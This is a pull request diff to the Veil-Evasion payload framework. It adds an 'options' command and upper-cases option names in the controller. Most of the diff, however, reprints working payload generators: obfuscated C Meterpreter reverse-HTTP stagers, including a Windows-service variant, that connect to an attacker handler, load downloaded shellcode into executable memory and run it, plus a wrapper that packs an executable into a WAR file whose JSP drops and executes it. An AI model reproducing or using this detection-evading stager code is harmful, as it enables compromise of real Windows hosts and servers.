### PR TITLE
Fix mix case 'set' & add option 'options'

### DIFF
--- a/modules/common/controller.py
+++ b/modules/common/controller.py
@@ -669,7 +669,7 @@ class Controller:
 
             while True:
 
-                choice = raw_input(" [>] Please enter a command: ").strip()
+                choice = raw_input(" [%s>>]: " % payloadname).strip()
 
                 if choice != "":
 
@@ -702,13 +702,13 @@ class Controller:
 
                         else:
 
-                            option = parts[1]
+                            option = parts[1].upper()
                             value = "".join(parts[2:])
 
                             #### VALIDATION ####
 
                             # validate LHOST
-                            if option.upper() == "LHOST":
+                            if option == "LHOST":
                                 if '.' in value:
                                     hostParts = value.split(".")
 
@@ -721,8 +721,8 @@ class Controller:
                                                 print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
                                             else:
                                                 try:
-                                                    payload.required_options[option.upper()][0] = value
-                                                    print " [i] %s => %s" % (option.upper(), value)
+                                                    payload.required_options[option][0] = value
+                                                    print " [i] %s => %s" % (option, value)
                                                 except KeyError:
                                                     print helpers.color("\n [!] ERROR #1: Specify LHOST value in the following screen.\n", warning=True)
                                                 except AttributeError:
@@ -731,8 +731,8 @@ class Controller:
                                         # assume we've been passed a domain name
                                         else:
                                             if helpers.isValidHostname(value):
-                                                payload.required_options[option.upper()][0] = value
-                                                print " [i] %s => %s" % (option.upper(), value)
+                                                payload.required_options[option][0] = value
+                                                print " [i] %s => %s" % (option, value)
                                             else:
                                                 print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
 
@@ -742,8 +742,8 @@ class Controller:
                                 elif ':' in value:
                                     try:
                                         socket.inet_pton(socket.AF_INET6, value)
-                                        payload.required_options[option.upper()][0] = value
-                                        print " [i] %s => %s" % (option.upper(), value)
+                                        payload.required_options[option][0] = value
+                                        print " [i] %s => %s" % (option, value)
                                     except socket.error:
                                         print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
                                         value = ""
@@ -753,14 +753,14 @@ class Controller:
                                     value = ""
 
                             # validate LPORT
-                            elif option.upper()  == "LPORT":
+                            elif option  == "LPORT":
                                 try:
                                     if int(value) <= 0 or int(value) >= 65535:
                                         print helpers.color("\n [!] ERROR: Bad port number specified.\n", warning=True)
                                     else:
                                         try:
-                                            payload.required_options[option.upper()][0] = value
-                                            print " [i] %s => %s" % (option.upper(), value)
+                                            payload.required_options[option][0] = value
+                                            print " [i] %s => %s" % (option, value)
                                         except KeyError:
                                             print helpers.color("\n [!] ERROR: Specify LPORT value in the following screen.\n", warning=True)
                                         except AttributeError:
@@ -771,8 +771,8 @@ class Controller:
                             # set the specific option value if not validation done
                             else:
                                 try:
-                                    payload.required_options[option.upper()][0] = value
-                                    print " [*] %s => %s" % (option.upper(), value)
+                                    payload.required_options[option][0] = value
+                                    print " [*] %s => %s" % (option, value)
                                 except:
                                     print helpers.color(" [!] ERROR: Invalid value specified.\n", warning=True)
                                     cmd = ""
@@ -830,7 +830,7 @@ class Controller:
                     messages.helpmsg(self.commands, showTitle=False)
                     showTitle=False
 
-                cmd = raw_input(' [>] Please enter a command: ').strip()
+                cmd = raw_input(' [menu>>]: ').strip()
 
                 # handle our tab completed commands
                 if cmd.startswith("help"):

--- a/modules/common/controller.py
+++ b/modules/common/controller.py
@@ -122,6 +122,7 @@ class Controller:
 
         self.payloadCommands = [    ("set","Set a specific option value"),
                                     ("info","Show information about the payload"),
+                                    ("options","Show payload's options"),
                                     ("generate","Generate payload"),
                                     ("back","Go to the main menu"),
                                     ("exit","exit Veil-Evasion")]
@@ -258,6 +259,17 @@ class Controller:
 
             print "\n [*] Folders cleaned\n"
 
+    def PayloadOptions(self, payload):
+        print helpers.color("\n Required Options:\n")
+
+        print " Name\t\t\tCurrent Value\tDescription"
+        print " ----\t\t\t-------------\t-----------"
+
+        # sort the dictionary by key before we output, so it looks nice
+        for key in sorted(self.payload.required_options.iterkeys()):
+            print " %s\t%s\t%s" % ('{0: <16}'.format(key), '{0: <8}'.format(payload.required_options[key][0]), payload.required_options[key][1])
+
+        print ""
 
     def PayloadInfo(self, payload, showTitle=True, showInfo=True):
         """
@@ -289,17 +301,7 @@ class Controller:
 
         # if required options were specified, output them
         if hasattr(self.payload, 'required_options'):
-            print helpers.color("\n [*] Required Options:\n")
-
-            print " Name\t\t\tCurrent Value\tDescription"
-            print " ----\t\t\t-------------\t-----------"
-
-            # sort the dictionary by key before we output, so it looks nice
-            for key in sorted(self.payload.required_options.iterkeys()):
-                print " %s\t%s\t%s" % ('{0: <16}'.format(key), '{0: <8}'.format(payload.required_options[key][0]), payload.required_options[key][1])
-
-            print ""
-
+            self.PayloadOptions(self.payload)
 
     def SetPayload(self, payloadname, options):
         """
@@ -719,18 +721,18 @@ class Controller:
                                                 print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
                                             else:
                                                 try:
-                                                    payload.required_options[option][0] = value
-                                                    print " [i] %s => %s" % (option, value)
+                                                    payload.required_options[option.upper()][0] = value
+                                                    print " [i] %s => %s" % (option.upper(), value)
                                                 except KeyError:
-                                                    print helpers.color("\n [!] ERROR: Specify LHOST value in the following screen.\n", warning=True)
+                                                    print helpers.color("\n [!] ERROR #1: Specify LHOST value in the following screen.\n", warning=True)
                                                 except AttributeError:
-                                                    print helpers.color("\n [!] ERROR: Specify LHOST value in the following screen.\n", warning=True)
+                                                    print helpers.color("\n [!] ERROR #2: Specify LHOST value in the following screen.\n", warning=True)
 
                                         # assume we've been passed a domain name
                                         else:
                                             if helpers.isValidHostname(value):
-                                                payload.required_options[option][0] = value
-                                                print " [i] %s => %s" % (option, value)
+                                                payload.required_options[option.upper()][0] = value
+                                                print " [i] %s => %s" % (option.upper(), value)
                                             else:
                                                 print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
 
@@ -740,8 +742,8 @@ class Controller:
                                 elif ':' in value:
                                     try:
                                         socket.inet_pton(socket.AF_INET6, value)
-                                        payload.required_options[option][0] = value
-                                        print " [i] %s => %s" % (option, value)
+                                        payload.required_options[option.upper()][0] = value
+                                        print " [i] %s => %s" % (option.upper(), value)
                                     except socket.error:
                                         print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
                                         value = ""
@@ -757,8 +759,8 @@ class Controller:
                                         print helpers.color("\n [!] ERROR: Bad port number specified.\n", warning=True)
                                     else:
                                         try:
-                                            payload.required_options[option][0] = value
-                                            print " [i] %s => %s" % (option, value)
+                                            payload.required_options[option.upper()][0] = value
+                                            print " [i] %s => %s" % (option.upper(), value)
                                         except KeyError:
                                             print helpers.color("\n [!] ERROR: Specify LPORT value in the following screen.\n", warning=True)
                                         except AttributeError:
@@ -769,8 +771,8 @@ class Controller:
                             # set the specific option value if not validation done
                             else:
                                 try:
-                                    payload.required_options[option][0] = value
-                                    print " [*] %s => %s" % (option, value)
+                                    payload.required_options[option.upper()][0] = value
+                                    print " [*] %s => %s" % (option.upper(), value)
                                 except:
                                     print helpers.color(" [!] ERROR: Invalid value specified.\n", warning=True)
                                     cmd = ""
@@ -792,6 +794,10 @@ class Controller:
 
                         else:
                             print helpers.color("\n [!] WARNING: not all required options filled\n", warning=True)
+                    if cmd == "options":
+                        # if required options were specified, output them
+                        if hasattr(self.payload, 'required_options'):
+                            self.PayloadOptions(self.payload)
 
 
     def MainMenu(self, showMessage=True, args=None):

--- a/modules/common/pythonpayload.py
+++ b/modules/common/pythonpayload.py
@@ -8,13 +8,14 @@ class PythonPayload:
     def __init__(self):
         self.language = "python"
         self.extension = "py"
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion"   : ["N", "Use the pyherion encrypter"],
-                                 "architecture"   : ["32", "Select the final binary architecture"]
+        self.required_python_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "ARCHITECTURE"   : ["32", "Select the final binary architecture (32, 64)"]
                                 }
 
     def _validateArchitecture(self):
-        if not self.required_options["architecture"][0] in ("32", "64"):
-            print helpers.color("\n [!] architecture must either be set to 32 or 64.\n", warning=True)
+        if not self.required_options["ARCHITECTURE"][0] in ("32", "64"):
+            print helpers.color("\n [!] ARCHITECTURE must either be set to 32 or 64.\n", warning=True)
             return ""
-        self.architecture = self.required_options["architecture"][0]
+        self.architecture = self.required_options["ARCHITECTURE"][0]

--- a/modules/payloads/auxiliary/coldwar_wrapper.py
+++ b/modules/payloads/auxiliary/coldwar_wrapper.py
@@ -19,15 +19,17 @@ import os
 import sys
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Auxiliary script which converts a .exe file to .war"
         self.language = "python"
         self.rating = "Normal"
         self.extension = "war"
-        
-        self.required_options = {   "original_exe"  :  ["", "Path to .exe file to convert to .war"],}
+
+        self.required_options = {
+                                    "ORIGINAL_EXE" : ["", "Path to a .exe file to convert to .war file"]  #/usr/share/windows-binaries/nc.exe
+                                }
 
 
     def generate(self):
@@ -51,20 +53,20 @@ class Payload:
         var_name = helpers.randomString()
         var_payload = helpers.randomString()
         random_war_name = helpers.randomString()
-        
+
         # Variables for path to our executable input and war output
-        original_exe = self.required_options["original_exe"][0]
+        ORIGINAL_EXE = self.required_options["ORIGINAL_EXE"][0]
         war_file = settings.PAYLOAD_COMPILED_PATH + random_war_name + ".war"
-        
+
         try:
             # read in the executable
-            raw = open(original_exe, 'rb').read()
+            raw = open(ORIGINAL_EXE, 'rb').read()
             txt_exe = hexlify(raw)
             txt_payload_file = open(var_hexfile + ".txt", 'w')
             txt_payload_file.write(txt_exe)
             txt_payload_file.close()
         except IOError:
-            print helpers.color("\n [!] original_exe file \"" + original_exe + "\" not found\n", warning=True)
+            print helpers.color("\n [!] ORIGINAL_EXE file \"" + ORIGINAL_EXE + "\" not found\n", warning=True)
             return ""
 
         # Set up our JSP files used for triggering the payload within the war file
@@ -96,12 +98,12 @@ class Payload:
         jsp_payload += var_outputstream + ".close();\n"
         jsp_payload += "Process " + var_proc + " = Runtime.getRuntime().exec(" + var_exepath + ");\n"
         jsp_payload += "%>\n"
-        
+
         # Write out the jsp code to file
         jsp_file_out = open(var_payload + ".jsp", 'w')
         jsp_file_out.write(jsp_payload)
         jsp_file_out.close()
-        
+
         # MANIFEST.MF file contents, and write it out to disk
         manifest_file = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
         man_file = open("MANIFEST.MF", 'w')

--- a/modules/payloads/auxiliary/pyinstaller_wrapper.py
+++ b/modules/payloads/auxiliary/pyinstaller_wrapper.py
@@ -13,8 +13,9 @@ from modules.common.pythonpayload import PythonPayload
 import settings
 
 class Payload(PythonPayload):
-    
+
     def __init__(self):
+        # pull in shared options
         PythonPayload.__init__(self)
 
         # required options
@@ -22,26 +23,28 @@ class Payload(PythonPayload):
         self.language = "python"
         self.rating = "Normal"
         self.extension = "py"
-        
-        self.required_options["python_source"] = ["", "Python source file to compile with pyinstaller"]
 
+        self.required_options = {
+                                    "PYTHON_SOURCE" : ["", "A Python source file to compile with pyinstaller"]   # /path/to/any/python/file.py
+                                }
+        self.required_options.update(self.required_python_options)
 
     def generate(self):
         self._validateArchitecture()
 
-        python_source = self.required_options["python_source"][0]
-        
+        PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
+
         try:
             # read in the python source
-            f = open(python_source, 'r')
+            f = open(PYTHON_SOURCE, 'r')
             PayloadCode = f.read()
             f.close()
         except IOError:
-            print helpers.color("\n [!] python_source file \""+python_source+"\" not found\n", warning=True)
+            print helpers.color("\n [!] PYTHON_SOURCE file \""+PYTHON_SOURCE+"\" not found\n", warning=True)
             return ""
 
         # example of how to check the internal options
-        if self.required_options["use_pyherion"][0].lower() == "y":
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
             PayloadCode = encryption.pyherion(PayloadCode)
 
         # return everything

--- a/modules/payloads/c/meterpreter/rev_http.py
+++ b/modules/payloads/c/meterpreter/rev_http.py
@@ -17,7 +17,7 @@ import random
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.shortname = "meter_rev_http"
@@ -25,38 +25,40 @@ class Payload:
         self.language = "c"
         self.extension = "c"
         self.rating = "Excellent"
-        
+
         # optional
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
-                                "LPORT" : ["8080", "Port of the metasploit handler"],
-                                "compile_to_exe" : ["Y", "Compile to an executable"]}
-        
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["8080", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
+
     def generate(self):
-        
+
         sumvalue_name = helpers.randomString()
         checksum_name = helpers.randomString()
         winsock_init_name = helpers.randomString()
         punt_name = helpers.randomString()
         wsconnect_name = helpers.randomString()
-        
+
         # the real includes needed
         includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>", "#include <time.h>"]
-        
+
         # max length string for obfuscation
         global_max_string_length = 10000
         max_string_length = random.randint(100,global_max_string_length)
         max_num_strings = 10000
-        
+
         # TODO: add in more string processing functions
         randName1 = helpers.randomString() # reverse()
         randName2 = helpers.randomString() # doubles characters
-        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
+        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
                                 (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                             ]
-                            
+
         random.shuffle(stringModFunctions)
-        
+
         # obfuscation "logical nop" string generation functions
         randString1 = helpers.randomString(50)
         randName1 = helpers.randomString()
@@ -73,17 +75,17 @@ class Payload:
                                 (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5))
                              ]
         random.shuffle(stringGenFunctions)
-        
+
         # obfuscation - add in our fake includes
-        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
+        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
                         "#include <limits.h>", "#include <assert.h>"]
         t = random.randint(1,7)
         for x in xrange(1, random.randint(1,7)):
             includes.append(fake_includes[x])
-        
+
         # shuffle up real/fake includes
         random.shuffle(includes)
-        
+
         code = "#define _WIN32_WINNT 0x0500\n"
         code += "#include <winsock2.h>\n"
         code += "\n".join(includes) + "\n"
@@ -99,24 +101,24 @@ class Payload:
         code += "int %s=0; int i;" %(retval_name)
         code += "for (i=0; i<strlen(%s);++i) %s += %s[i];" %(string_arg_name, retval_name, string_arg_name)
         code += "return (%s %% 256);}\n" %(retval_name)
-        
+
         # build the winsock_init function
         wVersionRequested_name = helpers.randomString()
         wsaData_name = helpers.randomString()
         code += "void %s() {" % (winsock_init_name)
         code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name)
         code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
-        
+
         # first logical nop string function
         code += stringGenFunctions[0][1] + "\n"
-        
+
         # build punt function
         my_socket_name = helpers.randomString()
         code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
         code += "closesocket(%s);" %(my_socket_name)
         code += "WSACleanup();"
         code += "exit(1);}\n"
-        
+
         # second logical nop string function
         code += stringGenFunctions[1][1] + "\n"
 
@@ -134,7 +136,7 @@ class Payload:
 
         # third logical nop string function
         code += stringGenFunctions[2][1] + "\n"
-        
+
         # build wsconnect function
         target_name = helpers.randomString()
         sock_name = helpers.randomString()
@@ -149,7 +151,7 @@ class Payload:
         code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
         code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
         code += "return %s;}\n" %(my_socket_name)
-        
+
         # build main() code
         size_name = helpers.randomString()
         buffer_name = helpers.randomString()
@@ -159,7 +161,7 @@ class Payload:
         request_buf_name = helpers.randomString()
         buf_counter_name = helpers.randomString()
         bytes_read_name = helpers.randomString()
-        
+
         # obfuscation stuff
         char_array_name_1 = helpers.randomString()
         number_of_strings_1 = random.randint(1,max_num_strings)
@@ -176,8 +178,8 @@ class Payload:
         code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
 
         # malloc our first string obfuscation array
-        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
-        
+        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
+
         # call the winsock init function
         code += "%s();" %(winsock_init_name)
 
@@ -186,10 +188,10 @@ class Payload:
 
         # create our socket
         code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
-        
+
         # malloc our second string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
-        
+
         # build and send the HTTP request to the handler
         code += "char %s[200];" %(request_buf_name)
         code += "sprintf(%s, \"GET /%%s HTTP/1.1\\r\\nAccept-Encoding: identity\\r\\nHost: %s:%s\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\\r\\n\\r\\n\", %s());" %(request_buf_name, self.required_options["LHOST"][0], self.required_options["LPORT"][0], checksum_name)
@@ -199,10 +201,10 @@ class Payload:
         # TODO: obfuscate/randomize the size of the page allocated
         code += "%s = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name)
         code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
-        
+
         # first string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
-        
+
         # read the full server response into the buffer
         code += "char * %s = %s;" % (buf_counter_name,buffer_name)
         code += "int %s; do {" % (bytes_read_name)
@@ -212,17 +214,16 @@ class Payload:
 
         # malloc our third string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
-        
+
         # second string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
-        
+
         # real code
         code += "closesocket(%s); WSACleanup();" %(my_socket_name)
         code += "((void (*)())strstr(%s, \"\\r\\n\\r\\n\") + 4)();" %(buffer_name)
 
         # third string obfuscation method (never called)
-        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])        
+        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
         code += "return 0;}\n"
 
         return code
-    

--- a/modules/payloads/c/meterpreter/rev_http_service.py
+++ b/modules/payloads/c/meterpreter/rev_http_service.py
@@ -20,7 +20,7 @@ import random
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.shortname = "meter_rev_http_service"
@@ -28,38 +28,40 @@ class Payload:
         self.language = "c"
         self.extension = "c"
         self.rating = "Excellent"
-        
+
         # optional
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
-                                "LPORT" : ["8080", "Port of the metasploit handler"],
-                                "compile_to_exe" : ["Y", "Compile to an executable"]}
-        
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["8080", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
+
     def generate(self):
-        
+
         sumvalue_name = helpers.randomString()
         checksum_name = helpers.randomString()
         winsock_init_name = helpers.randomString()
         punt_name = helpers.randomString()
         wsconnect_name = helpers.randomString()
-        
+
         # the real includes needed
         includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>", "#include <time.h>"]
-        
+
         # max length string for obfuscation
         global_max_string_length = 10000
         max_string_length = random.randint(100,global_max_string_length)
         max_num_strings = 10000
-        
+
         # TODO: add in more string processing functions
         randName1 = helpers.randomString() # reverse()
         randName2 = helpers.randomString() # doubles characters
-        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
+        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
                                 (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                             ]
-                            
+
         random.shuffle(stringModFunctions)
-        
+
         # obfuscation "logical nop" string generation functions
         randString1 = helpers.randomString(50)
         randName1 = helpers.randomString()
@@ -76,17 +78,17 @@ class Payload:
                                 (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5))
                              ]
         random.shuffle(stringGenFunctions)
-        
+
         # obfuscation - add in our fake includes
-        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
+        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
                         "#include <limits.h>", "#include <assert.h>"]
         t = random.randint(1,7)
         for x in xrange(1, random.randint(1,7)):
             includes.append(fake_includes[x])
-        
+
         # shuffle up real/fake includes
         random.shuffle(includes)
-        
+
         code = "#define _WIN32_WINNT 0x0500\n"
         code += "#include <winsock2.h>\n"
         code += "\n".join(includes) + "\n"
@@ -95,7 +97,7 @@ class Payload:
         hStatusName = helpers.randomString()
         serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void  ServiceMain(int argc, char** argv);", "void  ControlHandler(DWORD request);"]
         random.shuffle(serviceHeaders)
-        
+
         code += "\n".join(serviceHeaders)
 
         #string mod functions
@@ -109,24 +111,24 @@ class Payload:
         code += "int %s=0; int i;" %(retval_name)
         code += "for (i=0; i<strlen(%s);++i) %s += %s[i];" %(string_arg_name, retval_name, string_arg_name)
         code += "return (%s %% 256);}\n" %(retval_name)
-        
+
         # build the winsock_init function
         wVersionRequested_name = helpers.randomString()
         wsaData_name = helpers.randomString()
         code += "void %s() {" % (winsock_init_name)
         code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name)
         code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
-        
+
         # first logical nop string function
         code += stringGenFunctions[0][1] + "\n"
-        
+
         # build punt function
         my_socket_name = helpers.randomString()
         code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
         code += "closesocket(%s);" %(my_socket_name)
         code += "WSACleanup();"
         code += "exit(1);}\n"
-        
+
         # second logical nop string function
         code += stringGenFunctions[1][1] + "\n"
 
@@ -144,7 +146,7 @@ class Payload:
 
         # third logical nop string function
         code += stringGenFunctions[2][1] + "\n"
-        
+
         # build wsconnect function
         target_name = helpers.randomString()
         sock_name = helpers.randomString()
@@ -159,19 +161,19 @@ class Payload:
         code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
         code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
         code += "return %s;}\n" %(my_socket_name)
-        
+
 
         # real - main() method for the service code
         serviceName = helpers.randomString()
         code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
-        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), 
+        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName),
                                 "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
                                 "ServiceTable[1].lpServiceName = NULL;",
                                 "ServiceTable[1].lpServiceProc = NULL;"]
         random.shuffle(serviceTableEntries)
         code += "\n".join(serviceTableEntries)
         code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
-        
+
 
         # real - service status options for us to shuffle
         serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;",
@@ -182,16 +184,16 @@ class Payload:
                                 "ServiceStatus.dwCheckPoint = 0;",
                                 "ServiceStatus.dwServiceType = SERVICE_WIN32;"]
         random.shuffle(serviceStatusOptions)
-        
+
         # real - serviceMain() code
         code += "void ServiceMain(int argc, char** argv) {\n"
         code += "\n".join(serviceStatusOptions)
-        
+
         code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName)
         code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName)
         code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
         code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName)
-        
+
         code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
 
         # build main() code
@@ -203,7 +205,7 @@ class Payload:
         request_buf_name = helpers.randomString()
         buf_counter_name = helpers.randomString()
         bytes_read_name = helpers.randomString()
-        
+
         # obfuscation stuff
         char_array_name_1 = helpers.randomString()
         number_of_strings_1 = random.randint(1,max_num_strings)
@@ -219,8 +221,8 @@ class Payload:
         code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
 
         # malloc our first string obfuscation array
-        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
-        
+        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
+
         # call the winsock init function
         code += "%s();" %(winsock_init_name)
 
@@ -229,10 +231,10 @@ class Payload:
 
         # create our socket
         code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
-        
+
         # malloc our second string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
-        
+
         # build and send the HTTP request to the handler
         code += "char %s[200];" %(request_buf_name)
         code += "sprintf(%s, \"GET /%%s HTTP/1.1\\r\\nAccept-Encoding: identity\\r\\nHost: %s:%s\\r\\nConnection: close\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\\r\\n\\r\\n\", %s());" %(request_buf_name, self.required_options["LHOST"][0], self.required_options["LPORT"][0], checksum_name)
@@ -242,10 +244,10 @@ class Payload:
         # TODO: obfuscate/randomize the size of the page allocated
         code += "%s = VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name)
         code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
-        
+
         # first string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
-        
+
         # read the full server response into the buffer
         code += "char * %s = %s;" % (buf_counter_name,buffer_name)
         code += "int %s; do {" % (bytes_read_name)
@@ -255,40 +257,39 @@ class Payload:
 
         # malloc our third string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
-        
+
         # second string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
-        
+
         # real code
         code += "closesocket(%s); WSACleanup();" %(my_socket_name)
         code += "((void (*)())strstr(%s, \"\\r\\n\\r\\n\") + 4)();" %(buffer_name)
 
         # third string obfuscation method (never called)
-        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])        
+        code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
         code += "} return; }\n"
 
         # service control handler code
-        code += """void ControlHandler(DWORD request) 
-    { 
-        switch(request) 
-        { 
